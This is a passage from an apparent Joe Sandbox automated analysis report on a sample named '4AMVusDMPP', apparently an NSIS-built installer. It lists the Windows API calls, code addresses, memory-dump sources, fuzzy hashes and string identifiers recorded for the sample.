                                                          • Instruction Fuzzy Hash: 15017171944240EFE701ABB4AF8ABD97FB4AF55301F10457EE242F61E2CA7804459F2D
                                                          APIs
                                                          • GetDlgItem.USER32(?,?), ref: 00401D63
                                                          • GetClientRect.USER32(00000000,?), ref: 00401D70
                                                          • LoadImageW.USER32(?,00000000,?,?,?,?), ref: 00401D91
                                                          • SendMessageW.USER32(00000000,00000172,?,00000000), ref: 00401D9F
                                                          • DeleteObject.GDI32(00000000), ref: 00401DAE
                                                          Memory Dump Source
                                                          • Source File: 00000003.00000002.2114217917.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                           • Associated: 00000003.00000002.2114195458.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000003.00000002.2114243803.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000003.00000002.2114270865.000000000040A000.00000008.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000003.00000002.2114305090.0000000000455000.00000002.00000001.01000000.00000003.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_3_2_400000_4AMVusDMPP.jbxd
                                                          Similarity
                                                          • API ID: ClientDeleteImageItemLoadMessageObjectRectSend
                                                          • String ID:
                                                          • API String ID: 1849352358-0
                                                          • Opcode ID: cecd7757bc9d55480b756717b9ac07822063c1f28e7ac406cf665e6dd60447a2
                                                          • Instruction ID: 8bbc6a183a468c813578a114873fb97f9d5ca0b11dae6a70aa3aa56fe52826a6
                                                          • Opcode Fuzzy Hash: cecd7757bc9d55480b756717b9ac07822063c1f28e7ac406cf665e6dd60447a2
                                                          • Instruction Fuzzy Hash: 4BF0FF72A04518AFDB01DBE4DF88CEEB7BCEB48301B14047AF641F61A0CA749D519B38
                                                          APIs
                                                          • SendMessageTimeoutW.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401C8F
                                                          • SendMessageW.USER32(00000000,00000000,?,?), ref: 00401CA7
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000003.00000002.2114217917.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                           • Associated: 00000003.00000002.2114195458.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000003.00000002.2114243803.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000003.00000002.2114270865.000000000040A000.00000008.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000003.00000002.2114305090.0000000000455000.00000002.00000001.01000000.00000003.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_3_2_400000_4AMVusDMPP.jbxd
                                                          Similarity
                                                          • API ID: MessageSend$Timeout
                                                          • String ID: !
                                                          • API String ID: 1777923405-2657877971
                                                          • Opcode ID: 204806375d4f16312a37781d02af86e184349cdc68ded53cac09897120414cdc
                                                          • Instruction ID: ef61c68cd4a6cc3a6f3726d4b558d534156d03c1c75d5f5b51cfe904c604fa23
                                                          • Opcode Fuzzy Hash: 204806375d4f16312a37781d02af86e184349cdc68ded53cac09897120414cdc
                                                          • Instruction Fuzzy Hash: A621B471948209AEEF049FA5DA4AABD7BB4EB44304F14443EF605B61D0D7B845409B18
                                                          APIs
                                                          • RegEnumKeyW.ADVAPI32(?,00000000,?,00000105), ref: 00402DA9
                                                          • RegCloseKey.ADVAPI32(?,?,?), ref: 00402DB2
                                                          • RegCloseKey.ADVAPI32(?,?,?), ref: 00402DD3
                                                          Memory Dump Source
                                                          • Source File: 00000003.00000002.2114217917.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                           • Associated: 00000003.00000002.2114195458.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000003.00000002.2114243803.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000003.00000002.2114270865.000000000040A000.00000008.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000003.00000002.2114305090.0000000000455000.00000002.00000001.01000000.00000003.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_3_2_400000_4AMVusDMPP.jbxd
                                                          Similarity
                                                          • API ID: Close$Enum
                                                          • String ID:
                                                          • API String ID: 464197530-0
                                                          • Opcode ID: 1fd681a58c600dee98d7f7e5161f1cc79c94fe5fc9469311f060f0f5731105c3
                                                          • Instruction ID: 3410daaf41eb2a8de7896e1fb7aa518538b3e031ab7f3cb45a1fbd23233d04dd
                                                          • Opcode Fuzzy Hash: 1fd681a58c600dee98d7f7e5161f1cc79c94fe5fc9469311f060f0f5731105c3
                                                          • Instruction Fuzzy Hash: CE116A32500108FBDF12AB90CE09FEE7B7DAF44350F100076B905B61E0E7B59E21AB58
                                                          APIs
                                                          • CreateDirectoryW.KERNEL32(?,?,00000000), ref: 00405962
                                                          • GetLastError.KERNEL32 ref: 00405976
                                                          • SetFileSecurityW.ADVAPI32(?,80000007,00000001), ref: 0040598B
                                                          • GetLastError.KERNEL32 ref: 00405995
                                                          Memory Dump Source
                                                          • Source File: 00000003.00000002.2114217917.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                           • Associated: 00000003.00000002.2114195458.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000003.00000002.2114243803.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000003.00000002.2114270865.000000000040A000.00000008.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000003.00000002.2114305090.0000000000455000.00000002.00000001.01000000.00000003.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_3_2_400000_4AMVusDMPP.jbxd
                                                          Similarity
                                                          • API ID: ErrorLast$CreateDirectoryFileSecurity
                                                          • String ID:
                                                          • API String ID: 3449924974-0
                                                          • Opcode ID: c15d26eb0fd7dc0754592b558b3576eabd9f17effa54cf70e09af9e442894ad1
                                                          • Instruction ID: ca5323325ecea66cc3de0aafa4d6cbc44a00468c8660a14113972894dcb98988
                                                          • Opcode Fuzzy Hash: c15d26eb0fd7dc0754592b558b3576eabd9f17effa54cf70e09af9e442894ad1
                                                          • Instruction Fuzzy Hash: 970108B1C10219DADF009FA5C944BEFBFB4EB14314F00403AE544B6290DB789608CFA9
                                                          APIs
                                                            • Part of subcall function 004063E8: lstrcpynW.KERNEL32(?,?,00000400,00403576,00429240,NSIS Error,?,00000006,00000008,0000000A), ref: 004063F5
                                                            • Part of subcall function 00405D68: CharNextW.USER32(?,?,00425F30,?,00405DDC,00425F30,00425F30,00437800,?,774D2EE0,00405B1A,?,00437800,774D2EE0,00000000), ref: 00405D76
                                                            • Part of subcall function 00405D68: CharNextW.USER32(00000000), ref: 00405D7B
                                                            • Part of subcall function 00405D68: CharNextW.USER32(00000000), ref: 00405D93
                                                          • lstrlenW.KERNEL32(00425F30,00000000,00425F30,00425F30,00437800,?,774D2EE0,00405B1A,?,00437800,774D2EE0,00000000), ref: 00405E1E
                                                          • GetFileAttributesW.KERNEL32(00425F30,00425F30,00425F30,00425F30,00425F30,00425F30,00000000,00425F30,00425F30,00437800,?,774D2EE0,00405B1A,?,00437800,774D2EE0), ref: 00405E2E
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000003.00000002.2114217917.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                           • Associated: 00000003.00000002.2114195458.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000003.00000002.2114243803.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000003.00000002.2114270865.000000000040A000.00000008.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000003.00000002.2114305090.0000000000455000.00000002.00000001.01000000.00000003.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_3_2_400000_4AMVusDMPP.jbxd
                                                          Similarity
                                                          • API ID: CharNext$AttributesFilelstrcpynlstrlen
                                                          • String ID: 0_B
                                                          • API String ID: 3248276644-2128305573
                                                          • Opcode ID: df6e64e4f6769b316d4c1c7beb25aaa03b2c49ca2ab4503c480f7fe4b4eab687
                                                          • Instruction ID: e2ef3bf648e1011fa726b67e088789f036b8871ba300d86fb9c867912b04298b
                                                          • Opcode Fuzzy Hash: df6e64e4f6769b316d4c1c7beb25aaa03b2c49ca2ab4503c480f7fe4b4eab687
                                                          • Instruction Fuzzy Hash: B4F0F439109E5116D62233365D09BEF0548CF82354B5A853BFC91B22D2DB3C8A539DFE
                                                          APIs
                                                          • IsWindowVisible.USER32(?), ref: 004053F3
                                                          • CallWindowProcW.USER32(?,?,?,?), ref: 00405444
                                                            • Part of subcall function 004043AB: SendMessageW.USER32(?,00000000,00000000,00000000), ref: 004043BD
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000003.00000002.2114217917.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                           • Associated: 00000003.00000002.2114195458.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000003.00000002.2114243803.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000003.00000002.2114270865.000000000040A000.00000008.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000003.00000002.2114305090.0000000000455000.00000002.00000001.01000000.00000003.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_3_2_400000_4AMVusDMPP.jbxd
                                                          Similarity
                                                          • API ID: Window$CallMessageProcSendVisible
                                                          • String ID:
                                                          • API String ID: 3748168415-3916222277
                                                          • Opcode ID: 36caebe1fe8aa1eff7ff321662443c514d6827d4f2801b7b393fcb4226acda68
                                                          • Instruction ID: 343f6187318c33bb175646012d6cb398530476c6c15fe8dd96994d534b9a6b17
                                                          • Opcode Fuzzy Hash: 36caebe1fe8aa1eff7ff321662443c514d6827d4f2801b7b393fcb4226acda68
                                                          • Instruction Fuzzy Hash: CC0171B1200609ABDF305F11DD84B9B3666EBD4356F508037FA00761E1C77A8DD29A6E
                                                          APIs
                                                          • GetTickCount.KERNEL32 ref: 00405F2B
                                                          • GetTempFileNameW.KERNEL32(?,?,00000000,?,?,?,00435000,004034A3,00437000,00437800,00437800,00437800,00437800,00437800,774D3420,004036EF), ref: 00405F46
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000003.00000002.2114217917.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                           • Associated: 00000003.00000002.2114195458.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000003.00000002.2114243803.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000003.00000002.2114270865.000000000040A000.00000008.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000003.00000002.2114305090.0000000000455000.00000002.00000001.01000000.00000003.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_3_2_400000_4AMVusDMPP.jbxd
                                                          Similarity
                                                          • API ID: CountFileNameTempTick
                                                          • String ID: nsa
                                                          • API String ID: 1716503409-2209301699
                                                          APIs
                                                          • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,04000000,00000000,00000000,00426730,Error launching installer), ref: 004059FA
                                                          • CloseHandle.KERNEL32(?), ref: 00405A07
                                                          Strings
                                                          • Error launching installer, xrefs: 004059E4
                                                          Similarity
                                                          • API ID: CloseCreateHandleProcess
                                                          • String ID: Error launching installer
                                                          • API String ID: 3712363035-66219284
                                                          Memory Dump Source
                                                          • Source File: 00000003.00000002.2114062801.0000000000160000.00000040.00000800.00020000.00000000.sdmp, Offset: 00160000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_3_2_160000_4AMVusDMPP.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: Xq$Xq$Xq$Xq
                                                          • API String ID: 0-3965792415
                                                          APIs
                                                          • lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00406128,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405E53
                                                          • lstrcmpiA.KERNEL32(00000000,00000000), ref: 00405E6B
                                                          • CharNextA.USER32(00000000,?,00000000,00406128,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405E7C
                                                          • lstrlenA.KERNEL32(00000000,?,00000000,00406128,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405E85
                                                          Similarity
                                                          • API ID: lstrlen$CharNextlstrcmpi
                                                          • String ID:
                                                          • API String ID: 190613189-0